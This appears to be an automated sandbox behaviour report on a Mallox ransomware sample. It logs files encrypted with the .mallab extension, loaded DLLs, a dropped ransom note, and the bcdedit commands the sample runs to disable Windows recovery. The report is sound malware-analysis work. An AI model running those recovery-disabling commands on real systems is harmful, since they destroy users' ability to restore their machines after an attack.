      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json.mallab (copy) entropy: 7.99799965204Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json.mallab (copy) entropy: 7.99649833262Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json.mallab (copy) entropy: 7.99654639154Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json.mallab (copy) entropy: 7.99060232219Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout\checkoutdata.json.mallab (copy) entropy: 7.99561467794Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json.mallab (copy) entropy: 7.99872259358Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json.mallab (copy) entropy: 7.99967112013Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json.mallab (copy) entropy: 7.99991027036Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json.mallab (copy) entropy: 7.99333575751Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json.mallab (copy) entropy: 7.999926007Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.mallab (copy) entropy: 7.99960744928Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.mallab (copy) entropy: 7.99961409317Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.mallab (copy) entropy: 7.99340700006Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.mallab (copy) entropy: 7.99946477727Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.mallab (copy) entropy: 7.99966553105Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.mallab (copy) entropy: 7.99988098005Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GraphiteDawnCache\data_1.mallab (copy) entropy: 7.99931794453Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.mallab (copy) entropy: 7.99987873592Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GraphiteDawnCache\index.mallab (copy) entropy: 7.9993395761Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.mallab (copy) entropy: 7.99993148825Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GrShaderCache\data_1.mallab (copy) entropy: 7.99941095182Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GrShaderCache\index.mallab (copy) entropy: 7.99931322398Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb.mallab (copy) entropy: 7.99649950404Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb.mallab (copy) entropy: 7.99531674187Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb.mallab (copy) entropy: 7.99838218583Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb.mallab (copy) entropy: 7.99840578371Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb.mallab (copy) entropy: 7.99817774496Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb.mallab (copy) entropy: 7.9959948146Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb.mallab (copy) entropy: 7.99687414401Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-es.hyb.mallab (copy) entropy: 7.99014807212Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb.mallab (copy) entropy: 7.99055844966Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb.mallab (copy) entropy: 7.99490681172Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb.mallab (copy) entropy: 7.99882373101Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hu.hyb.mallab (copy) entropy: 7.99947192949Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Local State.mallab (copy) entropy: 7.99574843287Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Nurturing\campaign_history.mallab (copy) entropy: 7.99194002223Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb.mallab (copy) entropy: 7.99886366816Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\crs.pb.mallab (copy) entropy: 7.9993405793Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\SafetyTips\2983\safety_tips.pb.mallab (copy) entropy: 7.99848529279Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\ShaderCache\data_1.mallab (copy) entropy: 7.9992696119Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store.mallab (copy) entropy: 7.99990939725Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0.mallab (copy) entropy: 7.99485856112Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\ShaderCache\index.mallab (copy) entropy: 7.99934921178Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2.mallab (copy) entropy: 7.99377368752Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\LICENSE.mallab (copy) entropy: 7.99213148783Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules-AA.mallab (copy) entropy: 7.99954265225Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\Ruleset Data.mallab (copy) entropy: 7.99994647498Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules.mallab (copy) entropy: 7.9999030809Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\LICENSE.mallab (copy) entropy: 7.99238738986Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ES.mallab (copy) entropy: 7.99867767456Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-DE.mallab (copy) entropy: 7.99918756428Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-FR.mallab (copy) entropy: 7.99976329397Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-NL.mallab (copy) entropy: 7.99640631538Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-IT.mallab (copy) entropy: 7.99962188682Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-RU.mallab (copy) entropy: 7.99984399197Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0\typosquatting_list.pb.mallab (copy) entropy: 7.99884605306Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ZH.mallab (copy) entropy: 7.9997681404Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\Catalog\ListAll.Json.mallab (copy) entropy: 7.99963353865Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf.mallab (copy) entropy: 7.999216542Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf.mallab (copy) entropy: 7.99923967966Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf.mallab (copy) entropy: 7.99924888035Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf.mallab (copy) entropy: 7.99922492131Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf.mallab (copy) entropy: 7.99922475466Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf.mallab (copy) entropy: 7.99913044384Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf.mallab (copy) entropy: 7.99923889626Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf.mallab (copy) entropy: 7.99924512568Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf.mallab (copy) entropy: 7.99932645197Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf.mallab (copy) entropy: 7.99936215541Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf.mallab (copy) entropy: 7.99915877891Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf.mallab (copy) entropy: 7.99919997814Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_35.ttf.mallab (copy) entropy: 7.99972066721Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml.mallab (copy) entropy: 7.99646123947Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml.mallab (copy) entropy: 7.99574178842Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.mallab (copy) entropy: 7.99981297348Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml.mallab (copy) entropy: 7.99345369718Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml.mallab (copy) entropy: 7.99472162336Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml.mallab (copy) entropy: 7.99212583896Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml.mallab (copy) entropy: 7.99354434551Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.mallab (copy) entropy: 7.99960219664Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7FDF1322-9EAD-442A-85C2-C39D5CC6893F.mallab (copy) entropy: 7.9988577876Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1975C9BF-831E-44E7-8FD4-112275A074AD.mallab (copy) entropy: 7.99891624036Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml.mallab (copy) entropy: 7.99947755838Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.mallab (copy) entropy: 7.99224928527Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.mallab (copy) entropy: 7.99131015608Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.mallab (copy) entropy: 7.99192402378Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.mallab (copy) entropy: 7.9925769354Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\user\Local Settings\Microsoft\OneDrive\setup\logs\Install_2023-10-05_095006_950-1db4.log.mallab (copy) entropy: 7.99379354576Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess Stats: CPU usage > 49%
      Source: classification engineClassification label: mal100.rans.spyw.evad.winEXE@12/1242@1/5
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\bb7e5d0cf2dfb2b59be71d56e848e059_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Documents and Settings\All Users\Microsoft\Diagnosis\Temp\DiagTrackTraceSlot_alternativeTrace\HOW TO BACK FILES.txtJump to behavior
      Source: Ransomware Mallox.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSystem information queried: HandleInformationJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Ransomware Mallox.exeReversingLabs: Detection: 81%
      Source: unknownProcess created: C:\Users\user\Desktop\Ransomware Mallox.exe "C:\Users\user\Desktop\Ransomware Mallox.exe"
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} recoveryenabled no
      Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO BACK FILES.txt
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} recoveryenabled no
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
